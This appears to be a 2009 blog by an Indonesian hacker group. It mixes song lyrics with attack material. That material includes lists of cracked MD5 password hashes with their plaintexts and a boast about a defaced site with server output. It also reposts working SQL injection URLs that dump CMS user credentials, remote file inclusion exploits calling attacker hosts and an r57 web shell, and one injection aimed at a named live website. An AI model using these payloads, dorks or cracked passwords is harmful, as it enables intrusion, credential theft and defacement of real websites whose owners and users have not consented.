Friday, February 27, 2009

Hash Cracked

trapped eeb3fe2603459c1a2d36f274c9884de8
traubel 6ce6d95a6f50c6e0c5b211f3a88cdcae
travaioli 161bfaed94828a469836e37c053c5b24
travelling 5d55d8fa18da1ff5fd6b8aa699921ad8
travolta 35e21c3db1acbf900e8c92fbfa761c41
treacle 12873f83e7d37c554c9b1503b8625609
treatment 6292fea48cc177b8bde77da7be2e3c51
trees 2d5563ed288ac5396add9b78fbca810b
tresvant b9432c5dc3e35bcca1eece71c19235c7
trevor d801a0b4701f64a0eae5f71f44f8d83f
tribbles ca81601b0e6a2b249360ccfdd1cc71f8
trinere 55aeb060862bcaadb34c10be51fe35c2
tristar d65740220804de8da9843cb6cba68efa
tritt 58f61214090e9a055cd618cfb586b91d
trixter aa410c9111c7db8736d0c55f5847b3ee
trois df809177146786d164f1fdd500fa1b1e
trotsky cb4f3f03aab72fbdc6ead03fda325c15
trovaioli 9fc04884864e2e9cc3dc38f38f9b2066
truffaut 04eb51fd68c6eac1536fbd1a6160ea62
trusting be7bfa28cbb984263b76c454d54305eb
tuned b40b43fd5af2db4fbfeb4e83856e4876
turner 0f16cff442c47bbbf3b4715d7b39b3d2
tutti 8e080e1834aac678524b05313d4d8b9c
tutto 35a9b9c553129a2e647c70aae2088f61
twillie feff973491b28b2048e7e640f1dde939
twins 9275efa86a9ca523106d0238bbf8c0b2
tyne e071d9913efbe3c0e310ca435d4a7a58
types d14a8022b085f9ef19d479cbdd581127
uggams c8a866253bffeddfa4101f540d014965
uhuru c91497eaedfc46b7398ef737efc428e0
ultime 3fff9a8c636adb0115d963edd3aaae72
unbearable e4c3c9ec0e1ae26d9191d3dd2ab6734e
undiscovered f591da344a74f7eb0d9514e7430866ab
unforgiven d35e82c0b219c5a8517327a74d1f1396
ungar f6b6f0f0b6312f45a89f41fcedab1a95
unlawful e72a3910d952b9d75a9c011422169b0f
unoriginal 7f31f6da784692dfbf911ebb44321749
unsinkable d3f06208c89fddfeab92e900e626f8ed
untamed 0569d7d8557e26ca0c34abd6f1cb7009
untouchables 072bb4c3c210cd4312dd0209423ded51
uomini 9e8219d782343560e217b6a78b1820aa
uomo 774e9d4f7300a5a6fa2ce0447d28f27e
used 1aec9c5d0644e11fd9dd0f9fb36009fb
usuelli 1ae6a20f8f1b18903034b9a0ac08524b
valdimir c2ee9c13575ed78c7be8d05bbffc720b
valigia 214f3c53f0a508056e5c1c9123365e37
vallee c735e0e3a2f48d1c7593c578ed5a0206
valli 2e7fd5477682b0b54a1f060ba6b8eb70
valmouth baac99a0cdc4981d01a533cd068df017
values f09cc7ee3a9a93273f4b80601cafb00c
vandross 505bd95bb1e4702857af99a375e5573c
vangelis 2c4008bd20918d21be2a1d50ed2166af
vanzetti a8b2ff7cd5ab40a30ae8f912d5e753b9
varese e8f06abe0d9455ee445136d412f96483
variations 2598fe3ec117781a941e0e8ff655eaec
vario b691219af6d600c6b44be521bc72d0f7
variou 502b553be457c06dd9a912ccd3cef3f3
varney 307fb3283528d11b186b1dbbea100b2e
varujan 0bc6499fc7ee0c41bebef5be85606f76
vegas 0344adb607cb541118488284682da4dd
venduta 1a85b68665065e9a97533c9f44974fda
venere 61a24a2124e9bd75413404ea799ea316
venezia b0c399e7c5ef981bbca9a0b1f72b4139
ventura 43f6892b19a725cbb5c4048f88337c79
ventures 50947d0695f21832a1eda55a6318251d
verdon 7f91588846acc471f75f7774debc4b0a
vesta 285c65aae106302ffba3ce3a21dab3f1
vestoff d27eb3b966bda8fecc7773dd9a73b11c
vinny a04a649bd1ed7dc151a9dcf7ed2f8640
vino 69bb23ca275704f46c65d8ed4ac3b5d7
vinx 4e84d2a0d5d19bcc7c48c095d014f5f3
violenta 5f8530b87d69c5f1df11c6384fa2c4ee
vive 89cb77e3a49bde605a37afcd87508e16
vivi c3bb6f719742fd1e5768d6d1361cfb49
vizietto 3373a884abaf8104ea4bcc3e22add7c0
wagon 1dd908fb0ecaaee7cd33e3595dece640
wagons ff97c19d76ea81bb4f2a97f2ff0025e7
wailing 25fbaeeefc437dc6816eab4c6298b423
waits 303198d0056167e46a02445187efea69
wakeling e74709a24a825893485e6261f021834a
walker 1c3a0b25c3d1c909e2bcb9fe44c2f904
wanderers 5ac1eedb8dd70f7fbc91a3f2d3a04171
warlock 3398cb46ef96da5aad6ff70e60b98787
warner 1660885848050e9ca9746ddd54e2de25
wars ffa1e23980ca360c15665263d1e2d496
watley c5a4456d0c5fff98c1ae7b4afeb57ec0
waxman 1b61b42a9275e0fe5daa2d87abc257b1
weaver 758058d8987e7a9ec723bcdbec6c407e
webber 1c4ee6717f6f67e34d894202d1adbf9e
wedding 9e8e7343578f1819f85e1d9f7136cc40
weddings bf760eeb4cab0e970c836dc84130e037
weede 1ee11cf2a3fff4e615e16e289f5bb1ae
wellville 907b7353e51b56e596dfcded3e4fdf57
westerberg 52f469542833884851b3a9d09747d053
wheeler d44aba297c0d3aa4ff9e0ba79ddc58fa
whitley 36cedea35d6de52bf53a183b1a6d4646
whitmore 651b927e050cad877fec614240bf898d
whorehouse d522249349e87eeea0d3023c18366ea0
wido 02f78662729346070c200506ff61c823
willets 7a73fb78452f282d0a5acaa0f30fda60
willson 4c0ff93ef77c4c0d9cc288cba2a33ee5
willy e7236697824fb37763235980f1061218
winans 48ca47405b690b9a67b9375300f77818
windham 173d31292c7c22791048cc937e0fe08f
winds d00a2fec9aa4fb0ac7ed4a5073a41808
wings aa9f3975e1ac31d104905da5d2fa2d79
wiseman 84532a864b1a5f003528edf05edf5351
wishes b5cd1f00c6791b77e358231afd1ec35d
womack a1ce5768fdfc4b446aa9b5d30e20dbac
working c327b49efdca2668f28cd7b4beee54b3
worl 5b8d26dbbe6972efb423a5542b999fb4
wrestling f1800eb9b742b093359106546b9451a0
wynette 096b683ad233f7ecf4cdabed9dc5528f
wynton ec21de9c12daacfc240b3a4c2da918cc
xanadu 32373ca0a2699cec4bd97d912d2fede9
xmas bc55cdd78e059b9c0935dfdda17a280a
yamashirogumi 2c12781971bfdd63ec4699b00fb0211f
yankees 1d10ca7f8fe2615bf72a249a7d34d6b9
yankovic b2a3c981931278abeb20218ecdbe4020
yanni 809d190e8188a09526157a2b2458772f
yared 663db1e5f62ad66b58b9ad9aa78df356
years 75aeb98e5241592ad6a6c2c4c78a16ef
yearwood 709a704ed18d5dd7643c848a37419a53
yello c61dd29d8ca0b9811053d909ce7b0c6f
yentl 3165a45c0e42267e90ccb109f1ec7d92
yoakam 8e6096621f0da1a87bf0f6312e391598
youn 6c58135fca90040d292397afbab79e9f
youngbloods 25f77c730a0125d72453d553be951ebb
younger 0c7b95ee2d008a30f4589f3dc94ca6a1
youngsta b0e01113afcd8e773e24a55ca0a5de88
yours 2efe0008f59e6e614481f361c6f0fdb9
zabriskie 8704c639d7c93e16df8a05e11d1aefd2
zbigniew b80526194670e0b7fca68d79fe321ecf
zebrahead b00114f9fc38b48cc42a4972d7e07df6
zhao 77e6789426d131e4d862ecac4c7d0c5d
zhivago 22952237ab5954db7a4e7fc759372479
ziegfeld 0ca9e6f4295b9b83bfc4158afd897d9a
zimmer 43fcdd1901bd35328446756f83d85b28
zinman 432a1eda6a380831a08d41b89b9568dd
zinzi cbb53a168f36982a59fcb25f7a806ab9
zombies 9f63025bccd84c9dff056bf5d28100d8
zorba 0d57401765fabb1c1d5f207058908929
zorro 37a70993bae2f555da461ba7ea614eb2
zucchero 374362d9d73727148c366856d40e0146
zulu 7ab2493176d187c505a837d3c5cf8af5
zydeco 54e6d87eee0f5cb46168de8e490dc3e0



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Cracked Hash

81495c027241d3dc309428852164a68a tarahpol
2ecee85a2d8dff0ab3a7f9d7e1e4bda4 3006914
43440b9290eabcddaa3b1a3c3efdeb4b zxeroyx
06bb51580bad9dbdf7c51139b4324d10 2486959248
259e3936ceb623ada5b48beb971d688c cerverin
56289ed91281add402962da119fd5669 1968pp
82373355a71e04ad91760915e2e24139 75764948
580ef0836e519062e169d3259d344d30 427677123
15953ba1215bbe6b562b879afd202f23 601060
0e88336b8bca30c07d266b2e62d49dfa 26601980
0deedc996a94044b40f1be880d5cf506 629096250
951d01b8a2c632024c10a7ae1730b7f9 1721963
ee943db8f4ec8a64027718931f6829cc 1421735199
39cf85ab5e81be3a1e8cd2f91d945ad2 jrtobon
a4a34395c98c8a4594887fcff711d2de 040602
9c7f8f83fd3141719b51128c7dc286c5 martin1628
56706c48641d5e774191a00662041c93 king4ever
db36fdf51910d4cfa71a74f45f9211a1 elchefo
3f2d2585a9729491cb88289e7715e458 dkcimpe
19f297e263be5bd119f8ee8fdab8a36d di1178
500b486a1b9b103e9dfa92e4c3a3b70b 627566116
8f206aa322f16a3b45347facabfdcdb2 komunidad
a88cef71b66970d435883b3c53b2bb68 cholid
f2855f1e4c6b77ace54b6a6ef90ca100 luigar
c8fa4f581de7a72be5fdc156d728f6a4 202550620
f0af32b91b2df602b0690c97ad94bfc3 clancanu
b0ddeb412cc340d0f1eb9c47ad99f2c4 pwotftw
b81cfdb31df5021ed8af6c94ce1ed779 trusux



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Thursday, February 26, 2009

Malingsial Site pwned



Domain: http://tukulesto.gtfsabah.com/
Mirror: http://www.evilc0der.com/mirror/7050/
uname -a: Linux netserv.netkl.org
uid=99(nobody) gid=99(nobody) groups=99(nobody)



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

[waraxe-2004-SA#031] Multiple vulnerabilities in e107 version 0.615

www.waraxe.us

Author: Janek Vind "waraxe"
Date: 29. May 2004
Location: Estonia
Tartu Web: http://www.waraxe.us/index.php?modname=sa&id=31

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the official e107 Website - e107 is a portal / content management system powered by PHP and mySQL that gives you a totally dynamic and professional website out of the box.
It's simple wizard type install process will have you up and running in 5 minutes, and best of all it's completely free.

Homepage: http://e107.org/

Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, some conditions have to be met on victim server, to be vulnerable:

1. "register_globals" must be "on"
2. mysql must be version 4.x with enabled UNION functionality.

Now, let's discuss those security flaws:

A - Full Path Disclosure:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Many software developers, webmasters, admins and other IT staff are underestimating the full path disclosure as security bug.
Anyway, this information - full path to script - must be kept in secret, when possible, or it will be as little piece of the puzzle amongst many other pieces, which finally will lead to successful attack on the website.

A1 - many scripts can be accessed directly and this will provoke standard php error messages, which leads to full path disclosure.

Examples:
http://localhost/e107_0615/e107_plugins/alt_news/alt_news.php
http://localhost/e107_0615/e107_plugins/backend_menu/backend_menu.php
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php
http://localhost/e107_0615/e107_plugins/counter_menu/counter_menu.php
http://localhost/e107_0615/e107_plugins/login_menu/login_menu.php

... and many-many more, needed to be fixed!

B - Cross-site scripting aka XSS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Potential attacker can use xss to steal the cookies, to read cross-domain forms,etc.
Finally it can lead to admin account compromise and ovetakeing of the website.

B1 - xss in clock_menu.php through direct access of the script:
http://localhost/e107_0615/e107_plugins/clock_menu/clock_menu.php?clock_flat=1&LAN_407=foo%22); //--%3E%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

B2 - xss in feature called "email article to a friend":
attacker must be logged off and will enter to inputfield "logged name" this: foobar'>

B3 - xss in feature called "submit news":
Attacker is logged off and will enter to inputfield "logged name" this: foobar'>

B4 - xss in "user settings":
attacker is logged on and makes POST request like this: http://localhost/e107_0615/usersettings.php?avmsg=[xss code here]


C - Remote file inclusion:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Remote inclusion - this is VERY DANGEROUS security hole.
If php is configured with "allow_url_fopen=on" and there is no firewall, which blocks outbound connections, then potential attacker can force VICTIM's php engine to parse ATTACKER's php code!!
This can lead to shell-level server compromise (if there are permissions to execute system commands) with "nobody" or "apache" privileges.
Attacker can then try some local r00t exploits and finally server is 0wned ;)

C1 - remote file inclusion in "secure_img_render.php"
script: http://localhost/e107_0615/e107_handlers/secure_img_render.php?p=http://attacker.com/evil.php
Remark: "register_globals" must be "on" to be successful in exploitining in this way.

D - Sql injection
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Through sql injection potential attacker can gather from database any information he wants.
Including admin's username and password's md5 hash.
There are only 1...2 steps more to admin's account overtakeing...

D1 - critical sql injection bug #1 in "content.php" script:
http://localhost/e107_0615/content.php?content.99/**/UNION/**/SELECT/**/null,null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

D2 - critical sql injection bug #2 in "content.php" script:
http://localhost/e107_0615/content.php?query=content_id=99%20UNION%20select%20null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null,null,null%20FROM%20e107_user%20WHERE%20user_id=1/*

D3 - critical sql injection bug in "news.php" script:
http://localhost/e107_0615/news.php?list.99/**/UNION/**/SELECT/**/null,null,CONCAT(user_name,CHAR(58),user_email,CHAR(58),user_password),null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHERE/**/user_id=1/*

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
First of all, i suggest to use newer version 0.616, which seems to be patched against above discussed bugs.
And of course, you are welcome to visit forum on my homepage at http://www.waraxe.us/forum/ , where you can find tutorial about manual fixes.

See ya there!

Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna and to http://www.gamecheaters.us staff!
Special greets to icenix for helping me in bughunting!

Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it Janek Vind "waraxe"
Homepage: http://www.waraxe.us/

---------------------------------- [ EOF ] ------------------------------------

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Thursday, February 19, 2009

md5 hash result

HASH          RESULT
f68d6257f3283c29a2ac0939ac45b46c tr1lat3ral
b7d25e14395822461c97d9c9708d5cfb dc6W1hp
92794b20b92309b2e1ca335e4f95783e 6anina96
38461e5b1f0ab939ddc0b5951f356e33 c8ommega
7547db6e86d2a55fe0ab85985e367c33 ddsusanne
e865001d2e32ed9190a7bbf0c58b8678 2bUfciu
244ea1588f1d141bfef687fbdb331b6e id0173
9d36d5aaa414cbb9ecbe561f959658b6 922798
15dfff3348f289ea0e73f5ddd4a0f7a4 rex9869
12a4e59f670a12aa15ac3a8120efb1a3 us2rj6
3914591c9add5435d26f8d4750f5c108 itvbxy
cc19c8b8b6c36bac097274b15fa32efe oloxolox
8332047cb4ceb1646c17f33a868a2912 1zorec3
30266e69e9d2cc380c6c98391055f4f1 28.3.1975
1bee9d8781669c55144e989f8640a4c9 16.7.1975
b0acddac857b0971e0e414c50126c4c7 25.3.1965
4956c1b0cd069d16d3e53132bf89fc50 20.4.1989
43215c787d1360e929a8f4fa71f0262a 26.5.1969
ab2b6064596287b38e414993c40adb8e 2.7.1998
67b2ec5ae4a6fcbba6ad4aa3d0fe6b38 14.5.1979
e183cd80ffa8985d6ea90951c07ed89f 31.2.2007
20aa3c8217acdb0f7392d15017005703 31.8.1996
ee6fc195c819ddabacacb1cb270565dd 1.10.1996
790815a513fc928d8f122f6759ad2471 8.8.1976
a86a800fedcce2797efe5ab312b11da0 4fAlfred
f2677dc73de10f9e829404811b606b3e 7.8.1997
756c063bad497e5ebbc27358dcc22368 31.3.2000
b0846765a7547f951751551beb425f81 9.1.1997
398d16ebe8f7c85ae10b9f13f591f117 20.1.1971
3b9074c5d4764e2f9e99873dff41190b 21.6.1962
a727504b5780251b4ac559ee43d71d60 10.12.1987
dae803fc51619d543ac665172d95e99a 4.11.1981
cd565fe4525b6ec0c975fe817b2e7a49 17.2.1993
59cf2689c66f57a1e333a01f249940f0 30.2.1989
da5ed6ab373acb09d069c08fe3a903f3 10.9.1979
66b0c732b717706989a0c295f3c82d94 17.8.1990

67a589e29e4a60739b00297d78a7d3b5 5.4.1999
9fa2da1c619f64282c79c274f9321961 27.1.1962
7e7a975ba91734e00aede4927aacab33 19.10.1970
9ea13a4518d7d84b658b1f5762ef0219 5.11.1964
b160bd149cafa2947a29f4af5de15e6c 29.1.1979
4a641765e29597d4e966d9b124f0aa81 11.11.1982
c83a40f2ab4f886a2833eb6e3769e5a9 16.7.1989
3b93a29543674dcfe2850f4b53f73740 31.9.1996
d61f5249cf5d524ea639d67c1930b77a 13.4.1987
445f860497276ea9acadd4ada1e68b4a 13.3.1974
ef006c2690e99e3a18295b918519cde5 13.5.1963
98d4cbb1fc44a709eaa2255e03dd8504 30.1.1981
c3987a6cac0da267fa89e876cd4085fc 14.1.1997
22b3a25f13f3270bd9e419412b537b8f 31.11.1960
99e459f4a5e73766c09ac24edefefaa8 31.4.1997
51a8c24da181b92a01dca6463fb67a0b 8.6.1993
e7f4bce621b39ad224f73c0069345605 9.11.1965
27cfd5d2257efb5f2ff5e3f920977179 7.3.1971
f23434be08d89eac9fe55e0031cb700a 27.3.1980
39ea926727607cc4bc3799f2532a88f9 6.9.1994
a7825a2ce6400b7e0bd6f89a7bbbb75a 9309111979
87c08a8c6e89d2c53d79e0bda5845c53 9.6.1969
9576de8b41e56ca29dd98eb3a768db04 4.10.1979
ab1148d68917b63edc13d18d9f6507a7 12.8.1965
47a0f4f11c0f11ef5b67dac4274a358c 12.7.1977
a3fed49d4891d6eedb1b606076ba3c02 18.1.1969
b21596c54e76fae81f212b0264e2dc80 28.4.1970
ac0746237ce2bfefdaa03f2b97bfecca 8.5.1967
66ef0fc1f7bfa11f7b1e69204182096c 16.4.1968
dc00c693265599622c6ea296cf37255f 1.2.1981
6b9a4cca7ff84b05a5506312f5c7887c 22.1.1974
76ece562eb760b95a968d9d5c463d7b0 16.8.1971
4e28168261b1890625bc86c9582bd62a 20.3.1994
940453ba77f85b5a6994f09d5c9471bf 14.5.1968
d01d80ae31a20d8274c51dfc92f2e2d4 19.11.1960
d7169ac45c16186e64146e2294c88dc4 4.5.1964
b4d4017c1e9b36468fc8be5542308143 6.8.1973
0cd0cb0206016b70e1cc9a42457df98c 18.9.1977
1202eff4c17f78c62350111aa4c1708a 24.1.1993
cb730d1ba27048f61baba069e09185a7 1.5.1998
0cb8e7261a455dd11058ac3d6222e84f 10.4.1974
8ac35668b0d9c684d3ec65a3ea80cfb8 20.3.1975
04087800e68f180e7fe3c061f63276d9 3.8.1986
f85d65551afc2b9c2f82d78277fd8949 3.3.1966
72ca91f6b5ef3d4dc834f09dd84e1c02 29.12.1964
61652ec897816a652e9c7b9eb1c5a190 7.6.1991
ac5c7d4c516af8bac32e1e4890825b8e 16.1.1971
f0196b5527141dd363588f3e6c398ede 28.3.1974
1700fbccb0d05127c56d10b6777a42a4 31.6.1996
4b315e1a66d7720a986ade950a2bd95e 8etreppe
b9d339c439317b33a46caf5662dabfd9 c5biberle
e366de0e4023b753e8a138b4d83ecaf3 29618541
72ae77fd94da32b8ff7c00a2beac942f tasso712
8479c86348afb645a141b3e437848365 tardmonkey
861e86fea1390ff87ed8cb1952a0753d kdkqm5
9d36d5aaa414cbb9ecbe561f959658b6 922798
1e9a309b18baeee7a85d58d21a3192c4 752477


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Tuesday, February 17, 2009

Reel Big Fish - Where Have You Been?

You called me up last night in tears and said you missed me after all these years
But Ive been waiting here so long, Ive gotten over it since youve been gone
You called me up last night again and said youre finished with your new boyfriend
Asked if you could come back home- so sorry that you left me all alone

You say you love me, you love me again but if you love me- where have you been?
You say you need me more than anyone else well go to hell, where have you been?
You showed up at my door today and said my friend why do you push me away
Life with him was just so dull and what we had was something wonderful

You say you love me, you love me again but if you love me- where have you been?
You say you need me more than anyone else well go to hell- where have you been?
I said you wish! I dont need this! what makes you think Id ever want you again?
Yeah right! as if! what makes you think Id ever want you again?


Joomla/Mambo Component SWmenuFree 4.0 RFI Vulnerability

######################################################
#
# MAMBO Modules SWmenu 4.0 (ImageManager.php) Remote File Include Vulnerabilities
#
######################################################
#
# script : http://mamboxchange.com/frs/download.php/8109/com_swmenufree4.0.zip
#
######################################################
#
# file : /ImageManager/Classes/ImageManager.php
#
######################################################
#
# Dork : index.php?option=com_swmenupro
#
######################################################
#
# Found by & Contact : Cold z3ro , Cold-z3ro@hotmail.com , http://hack-teach.com/ , Team Hell
#
######################################################
#
# require_once($mosConfig_absolute_path."/administrator/components/com_swmenupro/ImageManager/Classes/Files.php");
#
######################################################
#
# Exploit :
#
# Here one : http://www.example.com/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
# Or : http://www.example.com/MAMBO_path/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=Evil-script?
#
######################################################


---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| | Kof2002 | |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
| The Sniper | . ||| Team Hell ||| | DearMan | |Pro Hacker| | 020 | | abdulla00 " alz3eem" | | The_Viper |
All i know


#Big Thx For : www.4azhar.com , Viva My HomeLand Palestine

# milw0rm.com [2007-03-23]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Joomla/Mambo Component Taskhopper 1.1 RFI Vulnerabilities

==================================================
Joomla/Mambo Component Taskhopper 1.1 (/inc/ mosConfig_absolute_path) RFI
==================================================
Found By : Cold z3ro , Cold-z3ro@hotmail.com
==================================================
Homepage: www.Hack-Teach.com
==================================================
Script Site : http://taskhopper.com/One1
==================================================
/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/itemstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/projectstatus_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/request_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/responses_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/timelog_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
/components/com_thopper/inc/urgency_type.php?mosConfig_absolute_path=http://nachrichtenmann.de/r57.txt?
==================================================



#Long Life Palestine
#www.Hack-Teach.com

# milw0rm.com [2007-04-10]

VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
--found by breaker_unit and Don
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Qur'an component allows you to read and listen to the Qur'an (The Islamic Holybook) online. A great resource for Islamic sites running on Mambo Open Source. This component was originally developed for PHP-Nuke by Syed Rasel at http://www.nzmuslim.net and then modified/ported to PostNuke and Mambo Open Source by Kemas Yunus Antonius.

Key Features:

* Displaying the Qur'an in Arabic and its translations.
* Enhanced with search function (using any keywords or by chapter number and verse number).
* Arabic recitation for both listening and downloading.
* Very user friendly.
* Using mysql database instead of file text.

Available translations at the moment:

* English
* Indonesian

You can get them all at http://www.kyantonius.com.


+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--

Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--

Greetz to:
balcan-crew.org
milw0rm.com
h4cky0u.biz

# milw0rm.com [2008-02-15]



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Song for Gaza

Dear friends,

I have been overwhelmed by the warmth and the friendship you have all given me in response to my song for Gaza, "We Will Not Go Down". I am doing my best to go through your numerous messages, emails and comments, and ask you to kindly bear with me until I am able to do so. Please forgive me if I am not able to respond to each and everyone of you; but please also know that I really appreciate your messages.

My original intention to donate proceeds from the sale of the MP3 to charity has been complicated by technical matters; therefore, I have decided to make the song available free of charge. I would like to request that after downloading the song from this page, you kindly donate directly to a charity or an organization dedicated to alleviate the suffering of the Palestinian people. Worthy of note is UNRWA (United Nations Relief and Works Agency for Palestine Refugees in the Near East), which has been helping Palestinian refugees since their dispossession in 1949. Please click here to donate through them: http://www.un.org/unrwa/

Thank you for your continued encouragement of my work as a musician, for your purchases of my CD (available here), and for spreading the song, the video and the message as you have been doing. I am grateful for every demonstration of support I have received from you, and for every thought and prayer that has gone to the people of Gaza.


Sincerely,

Michael Heart

=======================
for lyrics
WE WILL NOT GO DOWN (Song for Gaza)
(Composed by Michael Heart)
Copyright 2009


A blinding flash of white light
Lit up the sky over Gaza tonight
People running for cover
Not knowing whether they’re dead or alive

They came with their tanks and their planes
With ravaging fiery flames
And nothing remains
Just a voice rising up in the smoky haze

We will not go down
In the night, without a fight
You can burn up our mosques and our homes and our schools
But our spirit will never die
We will not go down
In Gaza tonight

Women and children alike
Murdered and massacred night after night
While the so-called leaders of countries afar
Debated on who’s wrong or right

But their powerless words were in vain
And the bombs fell down like acid rain
But through the tears and the blood and the pain
You can still hear that voice through the smoky haze

We will not go down
In the night, without a fight
You can burn up our mosques and our homes and our schools
But our spirit will never die
We will not go down
In Gaza tonight

Original From Michael Heart


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Only tried old bugs



Domain Name : http://www.bergaul.com/

Server banner : Apache/2.2.10 (Unix) mod_ssl/2.2.10 OpenSSL/0.9.7a mod_bwlimited/1.4

Operating system : Unix

Web server : Apache 2.x


LIVE
VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

YACS CMS 8.11 update_trailer.php Remote File Inclusion Vulnerability

-----------------[remote file include]-----------------

script: YACS version 8.11

------------------------------------------------------------------

download from: http://www.yetanothercommunitysystem.com/file-fetch/814-20081130-yacs-8.11rc30.zip


==============================================
vul: /yacs/scripts/update_trailer.php line 21 23 25;


include_once $context['path_to_root'].'shared/safe.php'; 21
if(!class_exists('i18n'))
include_once $context['path_to_root'].'i18n/i18n.php'; 23
if(!class_exists('SQL'))
include_once $context['path_to_root'].'shared/sql.php'; 25



==============================================

dork: "Powered by yacs"
----------------------------------------------

xpl:

http://127.0.0.1/path/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

http://127.0.0.1/yacs/scripts/update_trailer.php?context[path_to_root]=[shell.txt?]

***************************************************

---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from[iran]
---------------------------------------------------

# milw0rm.com [2009-02-16]


VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Thursday, February 12, 2009

Joomla and Mambo eWriting 1.2.1 Components - SQL injection

eWriting 1.2.1 - SQL injection

# Discovered by breaker_unit & Don
# BHack
# b4lc4n.org
# Gretz to h4cky0u.org l r00tsecurity.org l h4cky0u.biz l

Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"


Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--


Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+mos_users--


+++++++++++++++++++++++++++++++++++++

# milw0rm.com [2008-03-10]


==============================================================
EXAMPLE FROM ME :

http://sexxxploration.com/cms/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+jos_users--



VIVA INDONESIAN CODER TEAM
Fear Nothing. Risk Everything.

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Sweet Tomatoes Printable Coupons